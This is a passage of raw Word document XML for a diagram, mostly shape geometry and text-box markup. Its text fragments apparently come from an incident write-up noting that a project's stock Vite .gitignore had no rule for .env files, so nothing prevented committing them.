                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2657475" y="1771650"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633526" y="930"/>
                                  <a:pt x="635385" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4638"/>
                                  <a:pt x="638175" y="6890"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126454"/>
                                  <a:pt x="637245" y="128699"/>
                                  <a:pt x="635385" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633526" y="132407"/>
                                  <a:pt x="631280" y="133338"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133338"/>
                                  <a:pt x="4650" y="132407"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>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29" name="Rectangle 1729"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2684710" y="1795301"/>
                            <a:ext cx="775211" cy="140093"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="726B647F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>.</w:t>
                              </w:r>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>gitignore</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1730" name="Rectangle 1730"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3294608" y="1790012"/>
                            <a:ext cx="3234617" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6F4F272A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> was the stock Vite template: 27 lines covering</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1731" name="Shape 1731"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1943100"/>
                            <a:ext cx="752475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4638"/>
                                  <a:pt x="752475" y="6890"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="135979"/>
                                  <a:pt x="751545" y="138224"/>
                                  <a:pt x="749685" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="141945"/>
                                  <a:pt x="745580" y="142875"/>
                                  <a:pt x="742950" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>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32" name="Rectangle 1732"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="26938" y="1966751"/>
                            <a:ext cx="930254" cy="140093"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="39E0594F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>node_modules</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1733" name="Rectangle 1733"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="753368" y="1961462"/>
                            <a:ext cx="87709" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="185EE1EF"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1734" name="Shape 1734"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="819150" y="1943100"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135979"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282960" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="27622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35" name="Rectangle 1735"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="846385" y="1966751"/>
                            <a:ext cx="310085" cy="140093"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="40950E7C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="spellStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>dist</w:t>
                              </w:r>
                              <w:proofErr w:type="spellEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1736" name="Rectangle 1736"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1106537" y="1961462"/>
                            <a:ext cx="1930148" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="521DCC35" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve"> and editor directories, with </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1737" name="Rectangle 1737"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2557909" y="1961462"/>
                            <a:ext cx="236692" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="331228CA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>no</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1738" name="Shape 1738"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2733674" y="1943100"/>
                            <a:ext cx="285750" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282961" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4638"/>
                                  <a:pt x="285750" y="6890"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="135979"/>
                                  <a:pt x="284820" y="138224"/>
                                  <a:pt x="282961" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="141945"/>
                                  <a:pt x="278855" y="142875"/>
                                  <a:pt x="276225" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>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39" name="Rectangle 1739"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2762845" y="1966751"/>
                            <a:ext cx="310085" cy="140093"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="39B880A8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>.</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>env</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1740" name="Rectangle 1740"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3022997" y="1961462"/>
                            <a:ext cx="1210359" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="21CF5242" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="0B2D56"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                              <w:r w:rsidRPr="00C73B1A">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="auto"/>
                                </w:rPr>
                                <w:t>rule of any kind</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1741" name="Rectangle 1741"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3933081" y="1961462"/>
                            <a:ext cx="3062361" cy="148365"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1AFF37E9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:t>. Nothing prevented the commit and nothing</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="341B48D8" id="Group 27465" o:spid="_x0000_s1227" style="width:550.8pt;height:146.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin=",2547" coordsize="69954,1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&#10;AA==&#10;">
